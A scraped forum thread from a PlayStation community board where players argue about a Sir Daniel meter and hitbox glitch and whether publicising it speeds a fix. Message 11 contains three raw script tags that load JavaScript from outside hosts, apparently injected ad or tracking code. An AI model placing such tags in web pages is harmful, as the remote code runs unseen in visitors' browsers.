Reply
Gaming Beast
Registered: 11/22/2012
Offline
2167 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013
He's pretty ridiculous in FFA for the same reason.

The Fro never sleeps.png


 

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 11 of 34 (281 Views)
Reply
0 Likes
Fender Bender
Registered: 03/09/2009
Offline
4120 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013

good news, we now know how the glitch is triggered so superbot should be able to fix it.

 

bad news, EVERYONE AND THEIR GRANDMA KNOWS THE GLITCH NOW! WHY THE **bleep** DIDN'T THE UPLOADER MAKE THE VID PRIVATE??????????

Message 12 of 34 (281 Views)
Reply
0 Likes
Uncharted Territory
Registered: 12/21/2008
Offline
1819 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013

khknight wrote:

good news, we now know how the glitch is triggered so superbot should be able to fix it.

 

bad news, EVERYONE AND THEIR GRANDMA KNOWS THE GLITCH NOW! WHY THE **bleep** DIDN'T THE UPLOADER MAKE THE VID PRIVATE??????????


So that it becomes a pressing issue and gets resolved faster.

--------------------------------------------------------------------------------------------------------------
WHAT IS THIS!?
Message 13 of 34 (276 Views)
Fender Bender
Registered: 03/09/2009
Offline
4120 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013

Strife93 wrote:

khknight wrote:

good news, we now know how the glitch is triggered so superbot should be able to fix it.

 

bad news, EVERYONE AND THEIR GRANDMA KNOWS THE GLITCH NOW! WHY THE **bleep** DIDN'T THE UPLOADER MAKE THE VID PRIVATE??????????


So that it becomes a pressing issue and gets resolved faster.


he could of just sent the vid to superbot via email instead of posting it on youtube so the public can see it.

Message 14 of 34 (272 Views)
Reply
0 Likes
Uncharted Territory
Registered: 12/21/2008
Offline
1819 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013

khknight wrote:

Strife93 wrote:

khknight wrote:

good news, we now know how the glitch is triggered so superbot should be able to fix it.

 

bad news, EVERYONE AND THEIR GRANDMA KNOWS THE GLITCH NOW! WHY THE **bleep** DIDN'T THE UPLOADER MAKE THE VID PRIVATE??????????


So that it becomes a pressing issue and gets resolved faster.


he could of just sent the vid to superbot via email instead of posting it on youtube so the public can see it.


On the off chance that they see that one particular email? No, if something goes viral, it's likely to get noticed then resolved quicker. Just like ripping off a band-aid... Smiley Tongue

--------------------------------------------------------------------------------------------------------------
WHAT IS THIS!?
Message 15 of 34 (268 Views)
Reply
0 Likes
Fender Bender
Registered: 03/09/2009
Offline
4120 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013

Strife93 wrote:

khknight wrote:

Strife93 wrote:

khknight wrote:

good news, we now know how the glitch is triggered so superbot should be able to fix it.

 

bad news, EVERYONE AND THEIR GRANDMA KNOWS THE GLITCH NOW! WHY THE **bleep** DIDN'T THE UPLOADER MAKE THE VID PRIVATE??????????


So that it becomes a pressing issue and gets resolved faster.


he could of just sent the vid to superbot via email instead of posting it on youtube so the public can see it.


On the off chance that they see that one particular email? No, if something goes viral, it's likely to get noticed then resolved quicker. Just like ripping off a band-aid... Smiley Tongue


but what if everyone starts abusing the glitch and superbot takes a whole month to fix it? i don't want that to happen.

Message 16 of 34 (214 Views)
Reply
0 Likes
Uncharted Territory
Registered: 12/21/2008
Offline
1819 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013

khknight wrote:

Strife93 wrote:

khknight wrote:

Strife93 wrote:

khknight wrote:

good news, we now know how the glitch is triggered so superbot should be able to fix it.

 

bad news, EVERYONE AND THEIR GRANDMA KNOWS THE GLITCH NOW! WHY THE **bleep** DIDN'T THE UPLOADER MAKE THE VID PRIVATE??????????


So that it becomes a pressing issue and gets resolved faster.


he could of just sent the vid to superbot via email instead of posting it on youtube so the public can see it.


On the off chance that they see that one particular email? No, if something goes viral, it's likely to get noticed then resolved quicker. Just like ripping off a band-aid... Smiley Tongue


but what if everyone starts abusing the glitch and superbot takes a whole month to fix it? i don't want that to happen.


This won't take a month. As I said, like a band-aid. It'll hurt briefly, but the game will be stronger without it. Smiley Happy

--------------------------------------------------------------------------------------------------------------
WHAT IS THIS!?
Message 17 of 34 (207 Views)
Reply
0 Likes
Hekseville Citizen
Registered: 01/27/2009
Offline
373 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013

Hmm I believe this happened to be me once, I didn't know I was doing it though. I was able to get my Level 3 in a short amount of time without doing anything really.

Odd glitch though, I wouldn't use it now even though I know about it, just takes the fun out of winning. Smiley Tongue

Message 18 of 34 (204 Views)
Reply
0 Likes
Highlighted
Survivor
Registered: 12/09/2012
Offline
2365 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013
Yes, this needs to go so viral Super Bot has no choice but to put some serious power into fixing it.

I don't want to think of how much it would hurt to have to ban Sir Daniel at tournaments, or even in my league! There's one form of the glitch where it eliminates ALL hitboxes except a tiny one on his back. Not even throws work unless they are from behind...
Message 19 of 34 (193 Views)
Reply
0 Likes
Hekseville Citizen
Registered: 07/10/2012
Offline
256 posts
 

Re: Sir dan is god tier in 2v2.

Jan 8, 2013

I was fighting that asis aka guy the other day.,he picked sir dan and I was jak. now his meter was raising like a motha, and he got instan level 3's while he wasn't doing **bleep**. so I confronted him on it and told him, sir dan is glitching, his meter is going up way to fast... then he actually tried cover it up by saying that I sucked and he was destroying me. note, he only threw his hachet and the rest was me hitting him.

 

I was like, lol, seriously? I've never complained about him beating me, but when something seems unfair it should be noted. I'm not a sore loser but when I see a glitch then I will say something about it

but.. if you keep reading you'll notice that this is my signature.
Message 20 of 34 (185 Views)
Reply
0 Likes